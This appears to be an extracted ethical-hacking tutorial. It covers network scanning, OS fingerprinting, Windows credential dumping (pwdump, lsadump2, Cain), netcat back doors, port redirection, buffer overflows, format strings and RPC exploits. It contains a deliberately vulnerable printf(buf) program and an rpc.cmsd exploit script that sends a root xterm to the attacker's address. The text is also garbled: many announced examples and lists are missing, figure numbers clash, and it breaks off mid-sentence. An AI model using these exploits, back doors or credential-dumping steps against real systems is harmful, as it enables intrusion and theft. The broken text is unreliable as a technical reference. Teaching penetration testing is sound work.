One of the most basic steps in mapping out a network is performing an automated ping
sweep on a range of IP addresses and network blocks to determine if individual devices
or systems are alive. Ping is traditionally used to send ICMP ECHO (ICMP Type 8)
packets to a target system in an attempt to elicit an ICMP ECHO_REPLY (ICMP Type
0) indicating the target system is alive. Although ping is acceptable to determine the
number of systems alive in a small-to-midsize network (Class C is 254 and Class B is
65,534 potential hosts), it is inefficient for larger, enterprise networks. Scanning larger
Class A networks (16,277,214 potential hosts) can take hours if not days to complete.
To perform an ICMP ping sweep, you can use a myriad of tools available for both UNIX
and Windows. One of the tried-and-true techniques of performing ping sweeps in the
UNIX world is to use fping. Unlike more traditional ping sweep utilities, which wait for a
response from each system before moving on to the next potential host, fping is a utility
that will send out massively parallel ping requests in a round-robin fashion. Thus, fping
will sweep many IP addresses significantly faster than ping. fping can be used in one of
two ways: you can feed it a series of IP addresses from standard input (stdin) or you
can have it read from a file. Having fping read from a file is easy; simply create your file
with IP addresses on each line:
192.168.51.1
192.168.51.2
192.168.51.3
...
192.168.51.253
192.168.51.254
The –a option of fping will show only systems that are alive. You can also combine it
with the –d option to resolve hostnames if you choose. We prefer to use the –a option
with shell scripts and the –d option when we are interested in targeting systems that
have unique hostnames. Other options such as –f may interest you when scripting ping
sweeps. Type fping –h for a full listing of available options. Another utility that is
highlighted throughout this book is nmap from Fyodor. Although this utility is discussed
in much more detail later in this chapter, it is worth noting that it does offer ping sweep
capabilities with the –sP option.
For the Windows-inclined, we like the tried-and-true freeware product Super Scan from
Found stone, shown in Figure 1. It is one of the fastest ping sweep utilities available.
Like fping, Super Scan sends out multiple ICMP ECHO packets (in addition to three
other types of ICMP) in parallel and simply waits and listens for responses. Also like
fping, Super Scan allows you to resolve hostnames and view the output in an HTML file.
Figure 2. Super Scan from Foundstone is one of the fastest and most flexible ping
sweep utilities available
For those technically minded, here‘s a brief synopsis of the different types of ICMP
packets that can be used to ping a host. The primary ICMP types are
Any of these ICMP message types could potentially be used to discover a host on the
network; it just depends on the target‘s ICMP implementation and how it responds to
these packet types. How the different operating systems respond or don‘t respond to
the various ICMP types also aids in remote OS detection.
You may be wondering what happens if ICMP is blocked by the target site. It is not
uncommon to come across a security-conscious site that has blocked ICMP at the
border router or firewall. Although ICMP may be blocked, some additional tools and
techniques can be used to determine if systems are actually alive. However, they are
not as accurate or as efficient as a normal ping sweep.
When ICMP traffic is blocked, port scanning is the first alternate technique to determine
live hosts. By scanning for common ports on every potential IP address, we can
determine which hosts are alive if we can identify open or listening ports on the target
system. This technique can be time-consuming, but it can often unearth rogue systems
or highly protected systems.
For Windows, the tool we recommend is Super Scan. As discussed earlier, Super Scan
will perform both host and service discovery using ICMP and TCP/UDP, respectively.
Using the TCP/UDP port scan options, you can determine whether a host is alive or not
(without using ICMP at all). As you can see in Figure 2, simply select the check box for
each protocol you wish to use and the type of technique you desire, and you are off to
the races.
Another tool used for this host discovery technique is the UNIX/Windows tool nmap.
The Windows version, which is nmap with the Windows wrapper called Zenmap, is now
well supported so, for the truly command line challenged amongst you, you can easily
download the latest Windows version at nmap.org and get scanning quickly. Of course,
the product installs WinPcap so be prepared: if you haven‘t installed this application
before on your Windows system, you should know that this is a packet filter driver that
allows nmap to read and write raw packets from and to the wire.
Figure 2. Using SuperScan hosts hidden behind traditional firewalls can be found.
As you can see in Figure 3, nmap for Windows allows for a number of ping options to
discover hosts on a network. These host discovery options have long been available to
the UNIX world, but now Windows users can also leverage them.
As mentioned previously, nmap does provide the capability to perform ICMP sweeps.
However, it offers a more advanced option called TCP ping scan. A TCP ping scan is
initiated with the –PT option and a port number such as 80. We use 80 because it is a
common port that sites will allow through their border routers to systems on their
demilitarized zone (DMZ), or even better, through their main firewall(s). This option will
spew out TCP ACK packets to the target network and wait for RST packets indicating
the host is alive. ACK packets are sent because they are more likely to get through a
non stateful firewall such as Cisco IOS. Here‘s an example:
As you can see, this method is quite effective in determining if systems are alive, even if
the site blocks ICMP. It is worth trying a few iterations of this type of scan with common
ports such as SMTP (25), POP (110), AUTH (113), IMAP (143), or other ports that may
be unique to the site.
For the advanced technical reader, Hping2 from www.hping.org is an amazing TCP ping
utility for UNIX that should be in your toolbox. With additional TCP functionality beyond
nmap, Hping2 allows the user to control specific options of the UDP, TCP, or Raw IP
packet that may allow it to pass through certain access control devices.
To perform a simple TCP ping scan, set the TCP destination port with the –p option. By
doing this you can circumvent some access control devices similar to the trace route.
Hping2 can be used to perform TCP and UDP ping sweeps and it has the ability to
fragment packets, potentially bypassing some access control devices. Here‘s an
example:
[root]# hping2 192.168.0.2 -S -p 80 -f
HPING 192.168.0.2 (eth0 192.168.0.2): S set, 40 data bytes
60 bytes from 192.168.0.2: flags=SA seq=0 ttl=64 id=418 win=5840 time=3.2 ms
60 bytes from 192.168.0.2: flags=SA seq=1 ttl=64 id=420 win=5840 time=2.1 ms
60 bytes from 192.168.0.2: flags=SA seq=2 ttl=64 id=422 win=5840 time=2.0 ms
In some cases, simple access control devices cannot handle fragmented packets
correctly, thus allowing our packets to pass through and determine if the target system
is alive. Notice that the TCP SYN (S) flag and the TCP ACK (A) flag are returned
whenever a port is open (flags=SA). Hping2 can easily be integrated into shell scripts by
using the –cN packet count option, where N is the number of packets to send before
moving on. Although this method is not as fast as some of the ICMP ping sweep
methods mentioned earlier, it may be necessary given the configuration of the target
network.
1.2. DETERMINING WHICH SERVICES ARE RUNNING OR LISTENING
We have identified systems that are alive by using either ICMP or TCP ping sweeps and
have gathered selected ICMP information. Now we are ready to begin port scanning
each system.
Port scanning is the process of sending packets to TCP and UDP ports on the target
system to determine what services are running or are in a LISTENING state. Identifying
listening ports is critical to determining the services running, and consequently the
vulnerabilities present from your remote system. Additionally, you can determine the
type and version of the operating system and applications in use. Active services that
are listening are akin to the doors and windows of your house. They are ways into the
domicile. Depending on the type of path in (a window or door), it may allow an
unauthorized user to gain access to systems that are misconfigured or running a
version of software known to have security vulnerabilities. In this section we will focus
on several popular port-scanning tools and techniques that will provide us with a wealth
of information and give us a window into the vulnerabilities of the system. The port
scanning techniques that follow differ from those previously mentioned, when we were
trying to just identify systems that are alive. For the following steps, we will assume that
the systems are alive, and we are now trying to determine all the listening ports or
potential access points on our target.
Identifying both the TCP and UDP services running on the target system
Identifying the type of operating system of the target system
Identifying specific c applications or versions of a particular service
1.3. Scan Types
There are different types of Scanning methodology. Some of them are detailed below.
TCP connect scan will always completes a full three-way handshake (SYN,
SYN/ACK, and ACK). It is easily detected and logged by the target system.
Sending a SYN packet, (2) receiving a SYN/ACK packet, and (3) sending an ACK
packet
TCP SYN scan otherwise known as half-open scanning because a full TCP
connection is not made. Instead, only a SYN packet is sent to the target port. If a
SYN/ACK is received from the target port, we can deduce that it is in the
LISTENING state. If an RST/ACK is received, it usually indicates that the port is
not listening. An RST/ACK will be sent by the system performing the port scan so
that a full connection is never established. This technique has the advantage of
being stealthier than a full TCP connect, and it may not be logged by the target
system. However, one of the downsides of this technique is that this form of
scanning can produce a denial of service condition on the target by opening a
large number of half-open connections. But unless you are scanning the same
system with a high number of these connections, this technique is relatively safe.
TCP FIN scans This technique sends a FIN packet to the target port. Based on
RFC 793, the target system should send back an RST for all closed ports. This
technique usually only works on UNIX based TCP/IP stacks.
TCP Xmas Tree scans This technique sends a FIN, URG, and PUSH packet to
the target port. Based on RFC 793, the target system should send back an RST
for all closed ports.
TCP Null scan This technique turns off all flags. Based on RFC 793, the target
system should send back an RST for all closed ports.
TCP ACK scan This technique is used to map out firewall rule sets. It can help
determine if the firewall is a simple packet filter allowing only established
connections (connections with the ACK bit set) or a stateful firewall performing
advance packet filtering.
TCP Windows scan This technique may detect open as well as filtered/non
filtered ports on some systems due to an anomaly in the way the TCP windows
size is reported.
TCP RPC scan This technique is specific to UNIX systems and is used to detect
and identify Remote Procedure Call (RPC) ports and their associated program
and version number.
UDP scan This technique sends a UDP packet to the target port. If the target
port responds with an ―ICMP port unreachable‖ message, the port is closed.
Conversely, if you don‘t receive an ―ICMP port unreachable‖ message, you can
deduce the port is open. Because UDP is known as a connectionless protocol,
the accuracy of this technique is highly dependent on many factors related to the
utilization and filtering of the target network. In addition, UDP scanning is a very
slow process if you are trying to scan a device that employs heavy packet
filtering. If you plan on doing UDP scans over the Internet, be prepared for
unreliable results.
Certain IP implementations have the unfortunate distinction of sending back reset (RST)
packets for all ports scanned, regardless of whether or not they are listening. Therefore,
your results may vary when performing these scans; however, SYN and connect()
scans should work against all hosts.
A good port-scanning tool is a critical component of the foot printing process. Although
many port scanners are available for both the UNIX and Windows environments, we‘ll
limit our discussion to some of the more popular and time-proven port scanners.
Although strobe is highly reliable, you need to keep in mind some of its limitations: it is a
TCP scanner only and does not provide UDP scanning capabilities. Therefore, in the
preceding scan we are only looking at half the picture. For additional scanning
techniques beyond what strobe can provide, we must dig deeper into our toolkit.
2.2. Udp_scan
We can use udp_scan, originally from SATAN (Security Administrator Tool for Analyzing
Networks), written by Dan Farmer and Wietse Venema in 1995. Although SATAN is a
bit dated, its tools still work quite well. In addition, newer versions of SATAN, now called
SAINT, have been released at http:// wwdsilx.wwdsi.com. Many other utilities perform
UDP scans; however, to this day we have found that udp_scan is one of the most
reliable UDP scanners available. We should point out that although udp_scan is
reliable, it does have a nasty side effect of triggering a SATAN scan message on major
IDS products. Therefore, it is not one of the more stealthy tools you could employ.
Typically, we will look for all well-known ports below 1024 and specific high-risk ports
above 1024. Here‘s an example:
2.3. Netcat
Despite the ―old school‖ nature of this raw tool, another excellent utility is netcat (or
nc), written by Hobbit. This utility can perform so many tasks that everyone in the
industry calls it the Swiss Army knife of security. It provides basic TCP and UDP port-
scanning capabilities. The –v and –vv options provide verbose and very verbose output,
respectively. The –z option provides zero mode I/O and is used for port scanning, and
the –w2 option provides a timeout value for each connection. By default, nc will use
TCP ports. Therefore, we must specify the –u option for UDP scanning, as in the
second example shown next:
The Windows UDP Port Scanner (WUPS) hails from Arne Vidstrom at
http://ntsecurity.nu. It is a reliable, graphical, and relatively snappy UDP port scanner
(depending on the delay setting), despite the fact that it can only scan one host at a time
for sequentially specified ports. It is a solid tool for quick-and-dirty single-host UDP
scans, as shown if Figure 5.
Figure 5. The Windows UDP Port Scanner (WUPS) nails a system running SNMP (UDP
161).
A complete breakdown of Scan Line‘s functionality can be seen in the help file dump:
sl [-?bhijnprsTUvz]
[-cdgmq ]
[-flLoO <file>]
[-tu [, - ]]
IP[,IP-IP]
This example would scan TCP ports 80, 100, 101...200 and 443 on all IP addresses
from 10.0.0.1 to 10.0.1.200 inclusive, grabbing banners from those ports and hiding
hosts that had no open ports.
FIN probe A FIN packet is sent to an open port. As mentioned previously, RFC
793 states that the correct behavior is not to respond. However, many stack
implementations (such as Windows NT/200X/Vista) will respond with a FIN/ACK.
Bogus flag probe An undefined TCP flag is set in the TCP header of a SYN
packet. Some operating systems, such as Linux, will respond with the flag set in
their response packet.
Initial Sequence Number (ISN) sampling The basic premise is to find a pattern
in the initial sequence chosen by the TCP implementation when responding to a
connection request.
“Don’t fragment bit” monitoring Some operating systems will set the ―Don‘t
fragment bit‖ to enhance performance. This bit can be monitored to determine
what types of operating systems exhibit this behavior.
TCP initial window size Initial window size on returned packets is tracked. For
some stack implementations, this size is unique and can greatly add to the
accuracy of the fingerprint mechanism.
ACK value IP stacks differ in the sequence value they use for the ACK field, so
some implementations will send back the sequence number you sent, and others
will send back a sequence number + 1.
ICMP error message quenching Operating systems may follow RFC 1812 and
limit the rate at which error messages are sent. By sending UDP packets to some
random high-numbered port, you can count the number of unreachable
messages received within a given amount of time. This is also helpful in
determining if UDP ports are open.
Type of service (TOS) For ―ICMP port unreachable‖ messages, the TOS is
examined. Most stack implementations use 0, but this can vary.
TCP options TCP options are defined by RFC 793 and more recently by RFC
1323. The more advanced options provided by RFC 1323 tend to be
implemented in the most current stack implementations. By sending a packet
with multiple options set—such as no operation, maximum segment size, window
scale factor, and timestamps—it is possible to make some assumptions about
the target operating system.
Nmap employs the techniques mentioned earlier (except for the fragmentation handling
and ICMP error message queuing) by using the –O option. Let‘s take a look at our
target network:
By using nmap‘s stack fingerprint option, we can easily ascertain the target operating
system with precision. The accuracy of the determination is largely dependent on at
least one open port on the target. But even if no ports are open on the target system,
nmap can still make an educated guess about its operating system:
So even with no ports open, nmap correctly guessed the target operating system as
Linux.
One of the best features of nmap is that its signature listing is kept in a file called nmap-
os-fingerprints. Each time a new version of nmap is released, this file is updated with
additional signatures.
Although nmap‘s TCP detection seems to be the most accurate as of this writing, the
technology is not flawless and often provides only broad guesses that at times seem
less than helpful. But despite the challenges, it was not the first program to implement
such techniques. Queso is an operating system–detection tool that was released before
Fyodor incorporated his operating system detection into nmap. It is important to note
that queso is not a port scanner and performs only operating system detection via a
single open port (port 80 by default). If port 80 is not open on the target server, it is
necessary to specify an open port, as demonstrated next, using queso to determine the
target operating system via port 25:
6. Passive Signatures
Various characteristics of traffic can be used to identify an operating system.
TTL What does the operating system set as the time-to-live on the outbound
packet?
Window size What does the operating system set as the window size?
DF Does the operating system set the ―Don‘t fragment bit‖?
By passively analyzing each attribute and comparing the results to a known database of
attributes, you can determine the remote operating system. Although this method is not
guaranteed to produce the correct answer every time, the attributes can be combined to
generate fairly reliable results. This technique is exactly what the tool ‗siphon‘ uses.
The tried-and-true manual mechanism for enumerating banners and application info has
traditionally been based on telnet (a remote communications tool built into most
operating systems). Using telnet to grab banners is as easy as opening a telnet
connection to a known port on the target server, pressing enter a few times, if
necessary, and seeing what comes back:
C:\>telnet www.example.com 80
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Tue, 15 Jul 2008 21:33:04 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title>
</head><body>The parameter is incorrect.
</body> </html>
This is a generic technique that works with many common applications that respond on
a standard port, such as HTTP port 80, SMTP port 25, or FTP port 21.
For a slightly more surgical probing tool, rely on netcat, the ―TCP/IP Swiss Army
knife.‖ Netcat was written by Hobbit and ported to the Windows NT Family by Weld
Pond while he was with the L0pht security research group. When employed by the
enemy, it is simply devastating. Here, we will examine one of its more simplistic uses,
connecting to a remote TCP/IP port and enumerating the service banner:
C:\>nc –v www.example.com 80
www.example.com [10.219.100.1] 80 (http) open
A bit of input here usually generates some sort of a response. In this case, pressing
enter causes the following:
<html><head><title>Error</title>
</head><body>The parameter is incorrect.
</body> </html>
One tip from the netcat readme file discusses how to redirect the contents of a file into
netcat to nudge remote systems for even more information. For example, create a text
file called nudge.txt containing the single line GET / HTTP/1.0, followed by two carriage
returns, and then the following:
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Wed, 16 Jul 2008 01:00:32 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 8601
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRRABCR=BEFOAIJDCHMLJENPIPJGJACM; path=/
Cache-control: private
</HTML>
8. Gaining Access
Gaining Access to a network or system is the most important phase in Ethical Hacking.
Different types of systems require different methods of Gaining access techniques.
The power of getadmin was muted somewhat by the fact that it must be run by an
interactive user on the target system, as must most privilege-escalation attacks.
Because most users cannot log on interactively to a Windows server by default, it is
really only useful to rogue members of the various built-in Operators groups (Account,
Backup, Server, and so on) and the default Internet server account,
IUSR_machinename, who have this privilege. If malicious individuals have the
interactive logon privilege on your server already, privilege escalation exploits aren‘t
going to make things much worse. They already have access to just about anything else
they‘d want.
The Windows architecture still has a difficult time preventing interactively logged on
accounts from escalating privileges, due mostly to the diversity and complexity of the
Windows interactive login environment. Even worse, interactive logon has become
much more widespread as Windows Terminal Server has assumed the mantle of
remote management and distributed processing workhorse. Finally, it is important to
consider that the most important vector for privilege escalation for Internet client
systems is web browsing and e-mail processing.
We should note that obtaining Administrator status is not technically the highest
privilege one can obtain on a Windows machine. The SYSTEM account (also known as
the Local System, or NT AUTHORITY \SYSTEM account) actually accrues more
privilege than Administrator. However, there are a few common tricks to allow
administrators to attain SYSTEM privileges quite easily. One is to open a command
shell using the Windows Scheduler service as follows:
Or you could use the free psexec tool from Sysinternals.com, which will even allow you
to run as SYSTEM remotely.
The first step in any password-cracking exercise is to obtain the password hashes.
Depending on the version of Windows in play, this can be achieved in a number of
ways.
With Administrator access, password hashes can easily be dumped directly from the
Registry into a structured format suitable for offline analysis. The original utility for
accomplishing this is called pwdump by Jeremy Allison, and numerous improved
versions have been released, including pwdump2 by Todd Sabin; pwdump3e e-
business technology, Inc.; and pwdump6 by the foofus.net Team.
Foofus.net also released fgdump, which is a wrapper around pwdump6 and other tools
that automates remote hash extraction, LSA cache dumping, and protected store
enumeration. The pwdump family of tools uses the technique of DLL injection to insert
themselves into a privileged running process (typically lsass.exe) in order to extract
password hashes.
pwdump6 works remotely via SMB (TCP 139 or 445) but will not work within an
interactive login session (you can still use fgdump for interactive password dumping).
The following example shows pwdump6 being used against a Server 2008 system with
the Windows Firewall disabled:
Completed.
Note the NO PASSWORD output in the third field indicating that this server is not
storing hashes in the weaker LM format.
The LSA Secrets feature is one of the most insidious examples of the danger of leaving
credentials around in a state easily accessible by privileged accounts. The Local
Security Authority (LSA) Secrets cache, available under the Registry subkey of
HKLM\SECURITY\Policy\Secrets, contains the following items:
Service account passwords in plaintext. Service accounts are required by
software that must log in under the context of a local user to perform tasks, such
as backups. They are typically accounts that exist in external domains and, when
revealed by a compromised system, can provide a way for the attacker to log in
directly to the external ___domain.
Obviously, service account passwords that run under ___domain user privileges, last user
login, workstation ___domain access passwords, and so on, can all give an attacker a
stronger foothold in the ___domain structure.
For example, imagine a stand-alone server running Microsoft SMS or SQL services that
run under the context of a ___domain user. If this server has a blank local Administrator
password, LSA Secrets could be used to gain the ___domain-level user account and
password. This vulnerability could also lead to the compromise of a master user ___domain
configuration. If a resource ___domain server has a service executing in the context of a
user account from the master user ___domain, a compromise of the server in the resource
___domain could allow our malicious interloper to obtain credentials in the master ___domain.
Paul Ashton is credited with posting code to display the LSA Secrets to administrators
logged on locally. An updated version of this code, called lsadump2, is available at
http://razor.bindview.com/tools. lsadump2 uses the same technique as pwdump2 (DLL
injection) to bypass all operating system security. lsadump2 automatically finds the PID
of LSASS, injects itself, and grabs the LSA Secrets, as shown here (line wrapped and
edited for brevity):
We can see the machine account password for the ___domain and two SQL service
account–related passwords among the LSA Secrets for this system. It doesn‘t take
much imagination to discover that large Windows networks can be toppled quickly
through this kind of password enumeration.
Starting in Windows XP, Microsoft moved some things around and rendered lsadump2
inoperable when run as anything but the SYSTEM account. Modifications to the
lsadump2 source code have been posted that get around this issue. The all-purpose
Windows hacking tool Cain also has a built-in LSA Secrets extractor that bypasses
these issues when run as an administrative account.
Cain also has a number of other cached password extractors that work against a local
machine if run under administrative privileges. Figure 4-8 shows Cain extracting the
LSA Secrets from a Windows XP Service Pack 2 system and also illustrates the other
repositories from which Cain can extract passwords, including Protected Storage,
Internet Explorer 7, wireless networking, Windows Mail, dial-up connections, edit boxes,
SQL Enterprise Manger, and Credential Manager.
Figure 6. Cain‘s password cache decoding tools work against the local system when run
with administrative privileges
Windows also caches the credentials of users who have previously logged in to a
___domain. By default, the last ten logons are retained in this fashion. Utilizing these
credentials is not as straightforward as the cleartext extraction provided by LSADump,
however, since the passwords are stored in hashed form and further encrypted with a
machine-specific key. The encrypted cached hashes (try saying that ten times fast!) are
stored under the Registry key HKLM\SECURITY\CACHE\NL$n, where n represents a
numeric value from 1 to 10 corresponding to the last ten cached logons.
The hashes must, of course, be subsequently cracked to reveal the cleartext passwords
(updated tools for performing ―pass the hash,‖ or directly reusing the hashed password
as a credential rather than decrypting it, have not been published for some time). Any of
the Windows password-cracking tools we‘ve discussed in this chapter can perform this
task. One other tool we haven‘t mentioned yet, cachebf, will directly crack output from
CacheDump. You can find cachebf at http://www.toolcrypt.org/tools/cachebf /index.html.
Once Administrator access has been achieved and passwords extracted, intruders
typically seek to consolidate their control of a system through various services that
enable remote control. Such services are sometimes called back doors and are typically
hidden using techniques.
The –L makes the listener persistent across multiple connection breaks; -d runs netcat
in stealth mode (with no interactive console); and –e specifies the program to launch (in
this case, cmd.exe, the Windows command interpreter). Finally, –p specifies the port to
listen on. This will return a remote command shell to any intruder connecting to port
8080.
In the next sequence, we use netcat on a remote system to connect to the listening port
on the machine shown earlier (IP address 192.168.202.44) and receive a remote
command shell. To reduce confusion, we have again set the local system command
prompt to D:\> while the remote prompt is C:\TEMP\NC11Windows>.
As you can see, remote users can now execute commands and launch files. They are
limited only by how creative they can get with the Windows console.
Netcat works well when you need a custom port over which to work, but if you have
access to SMB (TCP 139 or 445), the best tool is psexec, from
http://www.sysinternals.com. psexec simply executes a command on the remote
machine using the following syntax:
The Metasploit framework also provides a large array of back door payloads that can
spawn new command-line shells bound to listening ports, execute arbitrary commands,
spawn shells using established connections, and connect a command shell back to the
attacker‘s machine, to name a few (see http://metasploit.com:55555/PAYLOADS). For
browser-based exploits, Metasploit has ActiveX controls that can be executed via a
hidden IEXPLORE.exe over HTTP connections.
9. Port Redirection
We‘ve discussed a few command shell–based remote control programs in the context of
direct remote control connections. However, consider the situation in which an
intervening entity such as a firewall blocks direct access to a target system. Resourceful
attackers can find their way around these obstacles using port redirection. Port
redirection is a technique that can be implemented on any operating system, but we‘ll
cover some Windows-specific tools and techniques here.
Once attackers have compromised a key target system, such as a firewall, they can use
port redirection to forward all packets to a specified destination. The impact of this type
of compromise is important to appreciate because it enables attackers to access any
and all systems behind the firewall (or other target). Redirection works by listening on
certain ports and forwarding the raw packets to a specified secondary target.
9.1. Fpipe
Fpipe is a TCP source port forwarder/redirector from Foundstone, Inc. It can create a
TCP stream with an optional source port of the user‘s choice. This is useful during
penetration testing for getting past firewalls that permit certain types of traffic through to
internal networks.
Fpipe basically works by redirection. Start fpipe with a listening server port, a remote
destination port (the port you are trying to reach inside the firewall), and the (optional)
local source port number you want. When fpipe starts, it will wait for a client to connect
on its listening port. When a listening connection is made, a new connection to the
destination machine and port with the specified local source port will be made, thus
creating a complete circuit. When the full connection has been established, fpipe
forwards all the data received on its inbound connection to the remote destination port
beyond the firewall and returns the reply traffic back to the initiating system. This makes
setting up multiple netcat sessions look positively painful. Fpipe performs the same task
transparently.
The term buffer refers to a data area shared by program processes that operate with
different sets of priorities. In other words, a buffer is a contiguous area in the system's
memory space that holds multiple instances of the same data type. The buffer allows
each process to operate without being held up by the other. In order for a buffer to be
effective, the size of the buffer and the way data is moved into and out of the buffer
need to be considered.
In the above code the variable name is assigned a length of 5 characters, however, the
main function allows the program to read an input that can be 10 characters long. The
'buf or buffer variable can only store a maximum of 5 characters. Now the question is
where does the excess characters find place on the system?
If "buf" is a global variable, then the excess data will probably be allocated in a data
segment elsewhere in the memory segment. The excess characters may then overwrite
an unrelated portion. Again, this is a possibility only. However in most cases, 'buf' is
likely to be a local variable, allocated on the stack. So instead of overwriting data, the
program tries to overwrite the stack itself.
In programming terms, a stack is an abstract data type. Stacks consist of objects and
typically function by placing the last object such that it is the first object to be removed
from the stack.
A malicious user of the program will try to input such that the program will overwrite the
rest of the data stored on the stack. Remember that there was code initially on the
stack. Once this is done, the attacker will try to input some machine code that will
overwrite the part of the stack that had code on it. It is possible for the attacker to
arrange for the execution of his code the next time the system calls the affected
function. If so, the program will execute the malicious code instead of the code that
normally would have been executed. It is a home run for the attacker. Note that the
attacker does not need to transfer very much data, but just enough to run something
that will allow him to connect to the target machine.
The media would like everyone to believe that some sort of magic is involved with
compromising the security of a UNIX system. In reality, four primary methods are used
to remotely circumvent the security of a UNIX system:
Format strings are very useful when used properly. They provide a way of formatting
text output by taking in a dynamic number of arguments, each of which should properly
match up to a formatting directive in the string. This is accomplished by the function
printf, by scanning the format string for ―%‖ characters. When this character is found,
an argument is retrieved via the stdarg function family. The characters that follow are
assessed as directives, manipulating how the variable will be formatted as a text string.
An example is the %i directive to format an integer variable to a readable decimal value.
In this case, printf("%i", val) prints the decimal representation of val on the screen for
the user. Security problems arise when the number of directives does not match the
number of supplied arguments. It is important to note that each supplied argument that
will be formatted is stored on the stack. If more directives than supplied arguments are
present, then all subsequent data stored on the stack will be used as the supplied
arguments. Therefore, a mismatch in directives and supplied arguments will lead to
erroneous output.
Another problem occurs when a lazy programmer uses a user-supplied string as the
format string itself, instead of using more appropriate string output functions. An
example of this poor programming practice is printing the string stored in a variable buf.
For example, you could simply use puts (buf) to output the string to the screen, or, if you
wish, printf ("%s", buf). A problem arises when the programmer does not follow the
guidelines for the formatted output functions. Although subsequent arguments are
optional in printf(), the first argument must always be the format string. If a user supplied
argument is used as this format string, such as in printf (buf), it may pose a serious
security risk to the offending program. A user could easily read out data stored in the
process memory space by passing proper format directives such as %x to display each
successive WORD on the stack.
Reading process memory space can be a problem in itself. However, it is much more
devastating if an attacker has the ability to directly write to memory. Luckily for the
attacker, the printf() functions provide them with the %n directive. printf() does not
format and output the corresponding argument, but rather takes the argument to be the
memory address of an integer and stores the number of characters written so far to that
___location. The last key to the format string vulnerability is the ability of the attacker to
position data onto the stack to be processed by the attacker‘s format string directives.
This is readily accomplished via printf and the way it handles the processing of the
format string itself. Data is conveniently placed onto the stack before being processed.
Therefore, eventually, if enough extra directives are provided in the format string, the
format string itself will be used as subsequent arguments for its own directives.
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[2048] = { 0 };
strncpy(buf, argv[1], sizeof(buf) - 1);
printf(buf);
putchar('\n');
return(0);
}
RPC services register with the portmapper when started. To contact an RPC service,
you must query the portmapper to determine on which port the required RPC service is
listening. Unfortunately, numerous stock versions of UNIX have many RPC services
enabled upon boot up. To exacerbate matters, many of the RPC services are extremely
complex and run with root privileges. Therefore, a successful buffer overflow or input
validation attack will lead to direct root access. The rage in remote RPC buffer overflow
attacks relates to the services rpc.ttdbserverd and rpc.cmsd which are part of the
common desktop environment (CDE). Because these two services run with root
privileges, attackers need only to successfully exploit the buffer overflow condition and
send back an xterm or a reverse telnet, and the game is over. Other dangerous RPC
services include rpc.statd and mountd, which are active when NFS is enabled. Even if
the portmapper is blocked, the attacker may be able to manually scan for the RPC
services (via the –sR option of nmap), which typically run at a high-numbered port. The
sadmind vulnerability has gained popularity with the advent of the sadmind/IIS worm.
Many systems are still vulnerable to sadmind years after it was found vulnerable! The
aforementioned services are only a few examples of problematic RPC services. Due to
RPC‘s distributed nature and complexity, it is ripe for abuse, as shown next:
rtable_create worked
clnt_call[rtable_insert]: RPC: Unable to receive; errno = Connection
reset
by peer
A simple shell script that calls the cmsd exploit simplifies this attack and is shown next.
It is necessary to know the system name; in our example, the system is named ―itchy.‖
We provide the target IP address of ―itchy,‖ which is 192.168.1.11. We provide the
system type (2), which equates to Solaris 2.6. This is critical because the exploit is
tailored to each operating system. Finally, we provide the IP address of the attacker‘s
system (192.168.1.103) and send back the xterm.
#!/bin/sh
if [ $# -lt 4 ]; then
echo "Rpc.cmsd buffer overflow for Solaris 2.5 & 2.6 7"
echo "If rpcinfo -p target_ip |grep 100068 = true - you win!"
echo "Don't forget to xhost+ the target system"
echo ""
echo "Usage: $0 target_hostname target_ip </ version (1-7)> your_ip"
exit 1
fi
echo "Executing exploit..."
cmsd -h $1 -c "/usr/openwin/bin/xterm -display $4:0.0 &" $3 $2
As you can see from this example, it is easy to exploit this overflow and gain root
access to the vulnerable system. It took little work for us to demonstrate this
vulnerability, so you can imagine how easy it is for the bad guys to set their sights on all
those vulnerable SNMP devices!
This is done because of the shortcomings in both the DNS protocol and vendor
implementations. This includes improper implementations of the transaction ID space
size and randomness, fixed source port for outgoing queries, and multiple identical
queries for the same resource record causing multiple outstanding queries for the
resource record.
As with any other DNS attack, the first step is to enumerate vulnerable servers. Most
attackers will set up automated tools to quickly identify unpatched and misconfigured
DNS servers.
To determine whether your DNS has this potential vulnerability, you perform the
following enumeration technique:
This will query named, and determine the associated version. Again, this underscores
how important accurately footprinting your environment is. In our example, the target
DNS server is running named version 9.4.2, which is vulnerable to the attack.
First, tcpdump must be running with the snaplen –s option, used to specify the number
of bytes in each packet to capture. For our example, we will use 500, which is enough to
re-create the buffer overflow condition in the AFS parsing routine:
It is important to mention that tcpdump run without a specified snaplen will default to 68
bytes, which is not enough to exploit this particular vulnerability. Now we will launch the
actual attack. We specify our target (192.168.1.200) running the vulnerable version of
tcpdump. This particular exploit is hard coded to send back an xterm, so we supply the
IP address of the attacking system, 192.168.1.50. Finally, we must supply a memory
offset for the buffer overflow condition (which may be different on other systems) of 100:
We are greeted with an xterm that has root privileges. Obviously, if this was a system
used to perform network management or that had an IDS that used tcpdump, the effects
would be devastating. What makes this problem worse is the fact that both the RPC
decoding and the TCP stream reassembly engine, named stream4, are enabled by
default. The Snort project had source patches and fixed binaries available for download
within hours of the vulnerability advisories being released; however, an exploit was
publicly available for the TCP stream reassembly vulnerability shortly after the advisory
was released.
21. Trojans
Once attackers have obtained root, they can ―Trojanize‖ just about any command on
the system. That‘s why it is critical that you check the size and date/timestamp on all
your binaries, but especially on your most frequently used programs, such as login, su,
telnet, ftp, passwd, netstat, ifconfig, ls, ps, ssh, find, du, df, sync, reboot, halt, shutdown,
and so on.
For example, a common Trojan in many rootkits is a hacked-up version of login. The
program will log in a user just as the normal login command does; however, it will also
log the input username and password to a file. A hacked-up version of ssh will perform
the same function as well.
Another Trojan may create a back door into your system by running a TCP listener that
waits for clients to connect and provide the correct password. Rathole, written by
Icognito, is a UNIX back door for Linux and OpenBSD. The package includes a makefile
and is easy to build. Compilation of the package produces two binaries: the client, rat,
and the server, hole. Rathole also includes support for blowfish encryption and process
name hiding. When a client connects to the back door, the client is prompted for a
password. After the correct password is provided, a new shell and two pipe files are
created. The I/O of the shell is duped to the pipes and the daemon encrypts the
communication. Options can be customized in hole.c and should be changed before
compilation. Following is a list of the options that are available and their default values:
For the purposes of this demonstration, we will keep the default values. The ratehole
